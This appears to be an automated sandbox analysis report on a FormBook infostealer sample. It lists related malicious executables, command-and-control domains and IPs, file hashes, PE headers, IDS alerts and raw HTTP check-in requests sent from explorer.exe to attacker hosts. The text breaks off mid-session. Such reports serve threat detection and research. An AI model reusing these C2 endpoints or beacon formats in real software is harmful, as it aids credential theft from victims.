                                          • www.scriptmonkey.uk/fuo8/?Nt=XG/6YPG4mC4580zNtSIrbcmm/9KFIxldlincGDuLPHZVLaCvtngXv0zfD4opFmKWjRRc5Wz70VNDi0pEoK7rm4v/YIff+OCR3A==&XIVGjH=k5qdxw
                                          DSG2011001_INV+PL.exeGet hashmaliciousFormBookBrowse
                                          • www.scriptmonkey.uk/fuo8/?0m=XG/6YPG4mC4580zNtSIrbcmm/9KFIxldlincGDuLPHZVLaCvtngXv0zfD4opFmKWjRRc5Wz70VNDi0pEoK7q0r/VPqGsrd+42Q==&xpLa=LKLKpTDYHf
                                          1030.exeGet hashmaliciousFormBookBrowse
                                          • www.jamjar-cars.co.uk/fsxg/?rzwgt58k=9GyInkOMBt44DpgTv0es8EfavTD2cACT7SunyTwue0EiZgOYx46rZ19Sf3WxMQ687DkAohgGj/uJPo1dENUD9bGtcFcfAFXZKQ==&2oGF=JeY-3_A
                                          SHIPPING DOCUMENT.exeGet hashmaliciousFormBookBrowse
                                          • www.scriptmonkey.uk/fuo8/?Jg=XG/6YPG4mC4580zNtSIrbcmm/9KFIxldlincGDuLPHZVLaCvtngXv0zfD4opFmKWjRRc5Wz70VNDi0pEoK7rqYvUPbXarPCR8K09EWJlmydn&aFC_=Paf3uC
                                          DSG2011001_INV+PL.exeGet hashmaliciousFormBookBrowse
                                          • www.scriptmonkey.uk/fuo8/?X3vna=XG/6YPG4mC4580zNtSIrbcmm/9KFIxldlincGDuLPHZVLaCvtngXv0zfD4opFmKWjRRc5Wz70VNDi0pEoK7rqYvUPbXarPCR8K09EWJlmydn&SW=L_n3I8gb1G2Tp
                                          TT SLIP.exeGet hashmaliciousFormBookBrowse
                                          • www.scriptmonkey.uk/fuo8/?oX=XG/6YPG4mC4580zNiDkuacqk79HsfAldlincGDuLPHZVLaCvtngXv0vfD4opFmKWjRRc5Wz70VNDi0pEoK7r0tjzAL3aqdyj5w==&3-5=y53XUVDgx1E7lu
                                          HSBC Payment Advice_pdf.exeGet hashmaliciousFormBookBrowse
                                          • www.scriptmonkey.uk/fuo8/?RhB=XG/6YPG4mC4580zNtSIrbcmm/9KFIxldlincGDuLPHZVLaCvtngXv0zfD4opFmKWjRRc5Wz70VNDi0pEoK7q0pvyBJesqdn12Q==&JvPscn=AkbZNW5YDPjA5Yj
                                          EM9MMRKjQ5.exeGet hashmaliciousFormBookBrowse
                                          • www.eventualstudios.com/scse/?jD=GVbdqHf0iPnhN6&f6A4=SEjcgcnkWK58ilxVp34xUXVZbsaNK2F3R4DngNHhXxXKjTUzM54TJSnUmKvf5VNKhI7+opbUoKTAQpnPJU2iwIOb2kvaOIglusXRWVTGq9gQ
                                          uUn2bfkWVn.exeGet hashmaliciousFormBookBrowse
                                          • www.eventualstudios.com/scse/?o0D=7nkLUjVPw&RjxxVL=SEjcgcnkWK58ilxVp34xUXVZbsaNK2F3R4DngNHhXxXKjTUzM54TJSnUmKvf5VNKhI7+opbUoKTAQpnPJU2j3JPC40fXMblx/g==
                                          Purchase Order List_pdf.exeGet hashmaliciousFormBookBrowse
                                          • www.scriptmonkey.uk/fuo8/?WsF=XG/6YPG4mC4580zNtSIrbcmm/9KFIxldlincGDuLPHZVLaCvtngXv0zfD4opFmKWjRRc5Wz70VNDi0pEoK7rqYvUPbXarPCR8K09EWJlmydn&kdG3k=kZo65Gt7X1g9OCz
                                          I4CAtrYlbC.exeGet hashmaliciousFormBookBrowse
                                          • www.jamjar-cars.co.uk/fsxg/?ohL17=9GyInkOMBt44DpgTv0es8EfavTD2cACT7SunyTwue0EiZgOYx46rZ19Sf3WxMQ687DkAohgGj/uJPo1dENUD9bGtcFcfAFXZKQ==&C_=_EjMs
                                          HSBC Account Statement 03FEB2023_pdf.exeGet hashmaliciousFormBookBrowse
                                          • www.scriptmonkey.uk/fuo8/
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          www.couldskuathink.comUm3ueFKBTAVSPPS.exeGet hashmaliciousFormBookBrowse
                                          • 168.76.71.70
                                          www.desipizza.ukwIQ8g7Sc7RrSm9l.exeGet hashmaliciousFormBookBrowse
                                          • 213.171.195.105
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          POWERLINE-AS-APPOWERLINEDATACENTERHKFtV0FviMeR.elfGet hashmaliciousMiraiBrowse
                                          • 154.218.213.181
                                          rEzWiNF5aO.elfGet hashmaliciousUnknownBrowse
                                          • 154.203.73.148
                                          nuklear.x86.elfGet hashmaliciousMiraiBrowse
                                          • 154.216.227.186
                                          b3astmode.x86.elfGet hashmaliciousMiraiBrowse
                                          • 156.242.255.15
                                          ZiraatEkstre_20230215.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 154.220.49.140
                                          H1H4XzVR1Z.elfGet hashmaliciousUnknownBrowse
                                          • 154.201.178.148
                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 160.124.87.97
                                          Wire Payment02132023.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 160.124.87.217
                                          33040117281.exeGet hashmaliciousCryptoWallBrowse
                                          • 154.213.153.25
                                          Mix0j7eDXO.exeGet hashmaliciousFormBookBrowse
                                          • 160.124.87.219
                                          Purchase Order Form.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 160.124.87.97
                                          bok.x86Get hashmaliciousMiraiBrowse
                                          • 156.250.157.136
                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 160.124.87.97
                                          bobash2.1.exeGet hashmaliciousFormBookBrowse
                                          • 160.124.87.219
                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 160.124.87.217
                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 156.242.168.19
                                          log21.armv5.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 107.151.116.83
                                          vEeEaXkCPz.elfGet hashmaliciousUnknownBrowse
                                          • 156.251.30.167
                                          uiPlgAraCw.elfGet hashmaliciousUnknownBrowse
                                          • 156.251.30.167
                                          W57bCRBhDJ.elfGet hashmaliciousUnknownBrowse
                                          • 156.251.30.167
                                          No context
                                          No context
                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1427
                                          Entropy (8bit):5.36986752454013
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4q0E4KiZi:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzA
                                          MD5:2D2AD84A1FE79CB9BD5D55F458A9C23C
                                          SHA1:EEFC372DBF9D0B316A3E69DCFC3293C0E49ED42E
                                          SHA-256:126A3CFAAB3941D4DBDFE10B1216BB7519EAA950A6DF903E8D31AEABB754CBD6
                                          SHA-512:375720738963E9EA57D52F90582436705064AF9EB557713A12741520B1972A61157370E2BABC9ADAE8F0D91789FABE3A3CDD8673508002647988D328A775299C
                                          Malicious:true
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                          Process:C:\Windows\explorer.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):984
                                          Entropy (8bit):5.2414849034866355
                                          Encrypted:false
                                          SSDEEP:24:Yq6CUXyhmbmPlbNdB6hmYmPlz0JahmNmPlHZ6T06Mhm6mPlbxdB6hm3mPl7KTdB2:YqDUXycSNbNdUcVNz0JacQNHZ6T06Mcs
                                          MD5:4816271302882BDFB06EE40F624169D1
                                          SHA1:A8F07F0A5940C4A9D4DAD112787FE109CCACA869
                                          SHA-256:26D30DFFC5E2C493FF97B32C775C98630F0466D49144778BAE2688BA0716C760
                                          SHA-512:3D46AA6777AF386524E65D8D158201B699F766A5640A3E917CFA78E337475F910A839B93E0097C6651D2FCBE02ED7BFAF9EF8274C9632A88D06985168087823B
                                          Malicious:false
                                          Preview:{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4155601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4145601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4135601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":4125601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4115601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4105601904,"LastSwitchedHighPart":30747926,"PrePopulated":true}]}
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.57277792108063
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
                                          File size:740864
                                          MD5:19a7c2a3f614a2f0c25065ed749eff53
                                          SHA1:fba7bde153caa8329cff3e906ea903402e51bc88
                                          SHA256:f8aa17381586d95eb4511d81932e4b53ddf5d3f17f8dc979f509ab94fe7cee64
                                          SHA512:ca3a8010ff908b42355e649eb322b4e85cb8262ddeef8daf76014272613dcd0ba87b36546cc5a30795f05a67a57cb1e7dfa5fcbd8c76fbba02f72434efba69c1
                                          SSDEEP:12288:qqzGPkZ9eklr7JRXfTyo7SRy0X6quo2SaATkVvJqo8SuRCUyo/MEAqDSugDs+9t:3YkhvvTejuo2lgkVvJq7SuQUjzAqDSu
                                          TLSH:30F48C8CC5F1EA3DEA898D7D331436081FE06A432A62C9F1D3E9F6C15B36263585D935
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..............0..D...........c... ........@.. ....................................@................................
                                          Icon Hash:00828e8e8686b000
                                          Entrypoint:0x4b63ba
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x63EDE9E4 [Thu Feb 16 08:31:32 2023 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb63680x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x5cc.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xb43c00xb4400False0.7556738145804438data7.5788906126167275IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xb80000x5cc0x600False0.431640625data4.137016367318869IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xba0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountry
                                          RT_VERSION0xb80900x33cdata
                                          RT_MANIFEST0xb83dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                          DLLImport
                                          mscoree.dll_CorExeMain
                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          192.168.2.5160.121.126.4449713802031453 02/16/23-23:50:26.920788TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971380192.168.2.5160.121.126.44
                                          192.168.2.5213.171.195.10549711802031449 02/16/23-23:50:01.373956TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971180192.168.2.5213.171.195.105
                                          192.168.2.5160.121.126.4449713802031412 02/16/23-23:50:26.920788TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971380192.168.2.5160.121.126.44
                                          192.168.2.5213.171.195.10549711802031412 02/16/23-23:50:01.373956TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971180192.168.2.5213.171.195.105
                                          192.168.2.5213.171.195.10549711802031453 02/16/23-23:50:01.373956TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971180192.168.2.5213.171.195.105
                                          192.168.2.5160.121.126.4449713802031449 02/16/23-23:50:26.920788TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971380192.168.2.5160.121.126.44
                                          TimestampSource PortDest PortSource IPDest IP
                                          Feb 16, 2023 23:48:58.033827066 CET4968480192.168.2.5104.77.36.175
                                          Feb 16, 2023 23:48:58.045753956 CET8049684104.77.36.175192.168.2.5
                                          Feb 16, 2023 23:48:58.045983076 CET4968480192.168.2.5104.77.36.175
                                          Feb 16, 2023 23:48:58.928316116 CET8049696178.79.225.0192.168.2.5
                                          Feb 16, 2023 23:48:58.928632975 CET4969680192.168.2.5178.79.225.0
                                          Feb 16, 2023 23:48:58.928709984 CET4969680192.168.2.5178.79.225.0
                                          Feb 16, 2023 23:48:58.943557978 CET8049696178.79.225.0192.168.2.5
                                          Feb 16, 2023 23:48:59.038875103 CET804969493.184.220.29192.168.2.5
                                          Feb 16, 2023 23:48:59.039171934 CET4969480192.168.2.593.184.220.29
                                          Feb 16, 2023 23:48:59.112078905 CET4969580192.168.2.593.184.221.240
                                          Feb 16, 2023 23:48:59.112174988 CET4969880192.168.2.5178.79.225.0
                                          Feb 16, 2023 23:48:59.118453026 CET8049698178.79.225.0192.168.2.5
                                          Feb 16, 2023 23:48:59.118542910 CET4969880192.168.2.5178.79.225.0
                                          Feb 16, 2023 23:48:59.126907110 CET8049698178.79.225.0192.168.2.5
                                          Feb 16, 2023 23:48:59.131023884 CET804969593.184.221.240192.168.2.5
                                          Feb 16, 2023 23:48:59.131201029 CET4969580192.168.2.593.184.221.240
                                          Feb 16, 2023 23:48:59.991338968 CET49701443192.168.2.523.0.174.89
                                          Feb 16, 2023 23:48:59.992275953 CET4970280192.168.2.593.184.220.29
                                          Feb 16, 2023 23:49:02.382020950 CET804969313.107.4.50192.168.2.5
                                          Feb 16, 2023 23:49:20.900618076 CET4970780192.168.2.545.195.140.44
                                          Feb 16, 2023 23:49:21.154349089 CET804970745.195.140.44192.168.2.5
                                          Feb 16, 2023 23:49:21.154531002 CET4970780192.168.2.545.195.140.44
                                          Feb 16, 2023 23:49:21.154639006 CET4970780192.168.2.545.195.140.44
                                          Feb 16, 2023 23:49:21.408185005 CET804970745.195.140.44192.168.2.5
                                          Feb 16, 2023 23:49:21.409626007 CET804970745.195.140.44192.168.2.5
                                          Feb 16, 2023 23:49:21.409650087 CET804970745.195.140.44192.168.2.5
                                          Feb 16, 2023 23:49:21.409810066 CET4970780192.168.2.545.195.140.44
                                          Feb 16, 2023 23:49:21.409846067 CET4970780192.168.2.545.195.140.44
                                          Feb 16, 2023 23:49:21.663577080 CET804970745.195.140.44192.168.2.5
                                          Feb 16, 2023 23:49:39.953025103 CET4970980192.168.2.5156.242.168.70
                                          Feb 16, 2023 23:49:40.022017956 CET4969480192.168.2.593.184.220.29
                                          Feb 16, 2023 23:49:40.040813923 CET804969493.184.220.29192.168.2.5
                                          Feb 16, 2023 23:49:40.040908098 CET4969480192.168.2.593.184.220.29
                                          Feb 16, 2023 23:49:40.179462910 CET8049709156.242.168.70192.168.2.5
                                          Feb 16, 2023 23:49:40.179745913 CET4970980192.168.2.5156.242.168.70
                                          Feb 16, 2023 23:49:40.180020094 CET4970980192.168.2.5156.242.168.70
                                          Feb 16, 2023 23:49:40.459059954 CET8049709156.242.168.70192.168.2.5
                                          Feb 16, 2023 23:49:40.575741053 CET8049709156.242.168.70192.168.2.5
                                          Feb 16, 2023 23:49:40.575779915 CET8049709156.242.168.70192.168.2.5
                                          Feb 16, 2023 23:49:40.575975895 CET4970980192.168.2.5156.242.168.70
                                          Feb 16, 2023 23:49:40.576030970 CET4970980192.168.2.5156.242.168.70
                                          Feb 16, 2023 23:49:40.802542925 CET8049709156.242.168.70192.168.2.5
                                          Feb 16, 2023 23:49:50.272389889 CET49678443192.168.2.520.190.159.3
                                          Feb 16, 2023 23:49:50.428546906 CET49680443192.168.2.520.190.159.3
                                          Feb 16, 2023 23:49:50.428563118 CET49679443192.168.2.520.190.159.3
                                          Feb 16, 2023 23:49:52.663106918 CET49687443192.168.2.513.107.42.16
                                          Feb 16, 2023 23:50:01.340694904 CET4971180192.168.2.5213.171.195.105
                                          Feb 16, 2023 23:50:01.373562098 CET8049711213.171.195.105192.168.2.5
                                          Feb 16, 2023 23:50:01.373773098 CET4971180192.168.2.5213.171.195.105
                                          Feb 16, 2023 23:50:01.373955965 CET4971180192.168.2.5213.171.195.105
                                          Feb 16, 2023 23:50:01.407131910 CET8049711213.171.195.105192.168.2.5
                                          Feb 16, 2023 23:50:01.407166004 CET8049711213.171.195.105192.168.2.5
                                          Feb 16, 2023 23:50:01.407186985 CET8049711213.171.195.105192.168.2.5
                                          Feb 16, 2023 23:50:01.407206059 CET8049711213.171.195.105192.168.2.5
                                          Feb 16, 2023 23:50:01.407239914 CET8049711213.171.195.105192.168.2.5
                                          Feb 16, 2023 23:50:01.407275915 CET8049711213.171.195.105192.168.2.5
                                          Feb 16, 2023 23:50:01.407382011 CET4971180192.168.2.5213.171.195.105
                                          Feb 16, 2023 23:50:01.407433033 CET4971180192.168.2.5213.171.195.105
                                          Feb 16, 2023 23:50:01.407433033 CET4971180192.168.2.5213.171.195.105
                                          Feb 16, 2023 23:50:01.408441067 CET8049711213.171.195.105192.168.2.5
                                          Feb 16, 2023 23:50:01.408461094 CET8049711213.171.195.105192.168.2.5
                                          Feb 16, 2023 23:50:01.408518076 CET4971180192.168.2.5213.171.195.105
                                          Feb 16, 2023 23:50:01.408555984 CET4971180192.168.2.5213.171.195.105
                                          Feb 16, 2023 23:50:26.714428902 CET4971380192.168.2.5160.121.126.44
                                          Feb 16, 2023 23:50:26.920475006 CET8049713160.121.126.44192.168.2.5
                                          Feb 16, 2023 23:50:26.920649052 CET4971380192.168.2.5160.121.126.44
                                          Feb 16, 2023 23:50:26.920788050 CET4971380192.168.2.5160.121.126.44
                                          Feb 16, 2023 23:50:27.126738071 CET8049713160.121.126.44192.168.2.5
                                          Feb 16, 2023 23:50:27.130139112 CET8049713160.121.126.44192.168.2.5
                                          Feb 16, 2023 23:50:27.130167961 CET8049713160.121.126.44192.168.2.5
                                          Feb 16, 2023 23:50:27.130325079 CET4971380192.168.2.5160.121.126.44
                                          TimestampSource PortDest PortSource IPDest IP
                                          Feb 16, 2023 23:49:20.711571932 CET6145253192.168.2.58.8.8.8
                                          Feb 16, 2023 23:49:20.892816067 CET53614528.8.8.8192.168.2.5
                                          Feb 16, 2023 23:49:39.775243998 CET5148453192.168.2.58.8.8.8
                                          Feb 16, 2023 23:49:39.951545000 CET53514848.8.8.8192.168.2.5
                                          Feb 16, 2023 23:50:01.298953056 CET5675153192.168.2.58.8.8.8
                                          Feb 16, 2023 23:50:01.327773094 CET53567518.8.8.8192.168.2.5
                                          Feb 16, 2023 23:50:26.690507889 CET6097553192.168.2.58.8.8.8
                                          Feb 16, 2023 23:50:26.713769913 CET53609758.8.8.8192.168.2.5
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Feb 16, 2023 23:49:20.711571932 CET192.168.2.58.8.8.80x964aStandard query (0)www.anbietertest.comA (IP address)IN (0x0001)false
                                          Feb 16, 2023 23:49:39.775243998 CET192.168.2.58.8.8.80xc6c7Standard query (0)www.hblcfl.comA (IP address)IN (0x0001)false
                                          Feb 16, 2023 23:50:01.298953056 CET192.168.2.58.8.8.80x97f4Standard query (0)www.desipizza.ukA (IP address)IN (0x0001)false
                                          Feb 16, 2023 23:50:26.690507889 CET192.168.2.58.8.8.80xdf2fStandard query (0)www.couldskuathink.comA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Feb 16, 2023 23:49:20.892816067 CET8.8.8.8192.168.2.50x964aNo error (0)www.anbietertest.com45.195.140.44A (IP address)IN (0x0001)false
                                          Feb 16, 2023 23:49:39.951545000 CET8.8.8.8192.168.2.50xc6c7No error (0)www.hblcfl.com156.242.168.70A (IP address)IN (0x0001)false
                                          Feb 16, 2023 23:49:39.951545000 CET8.8.8.8192.168.2.50xc6c7No error (0)www.hblcfl.com172.241.173.201A (IP address)IN (0x0001)false
                                          Feb 16, 2023 23:50:01.327773094 CET8.8.8.8192.168.2.50x97f4No error (0)www.desipizza.uk213.171.195.105A (IP address)IN (0x0001)false
                                          Feb 16, 2023 23:50:26.713769913 CET8.8.8.8192.168.2.50xdf2fNo error (0)www.couldskuathink.com160.121.126.44A (IP address)IN (0x0001)false
                                          • www.anbietertest.com
                                          • www.hblcfl.com
                                          • www.desipizza.uk
                                          • www.couldskuathink.com
                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.54970745.195.140.4480C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 16, 2023 23:49:21.154639006 CET22OUTGET /p25s/?T6AhrZK=8vxucxXa/EdtAtEUVmScDgQ/joE+PM1yWDdp5simyx02ZDdzbP+rJDfYcK0t31FDPOoC&W2MXm=JzuDhNAPN4 HTTP/1.1
                                          Host: www.anbietertest.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Feb 16, 2023 23:49:21.409626007 CET22INHTTP/1.1 503 Service Unavailable
                                          Server: nginx/1.14.2
                                          Date: Thu, 16 Feb 2023 22:49:21 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Data Raw: 31 33 0d 0a 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 13Service Unavailable0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.549709156.242.168.7080C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 16, 2023 23:49:40.180020094 CET30OUTGET /p25s/?T6AhrZK=ewBdcR2k39opbljxfcdCb6O0QV5Mz3QFjc7TltSJEncU02WcdPmt9gDEZVm+Mf599Sy4&W2MXm=JzuDhNAPN4 HTTP/1.1
                                          Host: www.hblcfl.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Feb 16, 2023 23:49:40.575741053 CET31INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Thu, 16 Feb 2023 22:47:33 GMT
                                          Content-Type: text/html
                                          Content-Length: 466
                                          Connection: close
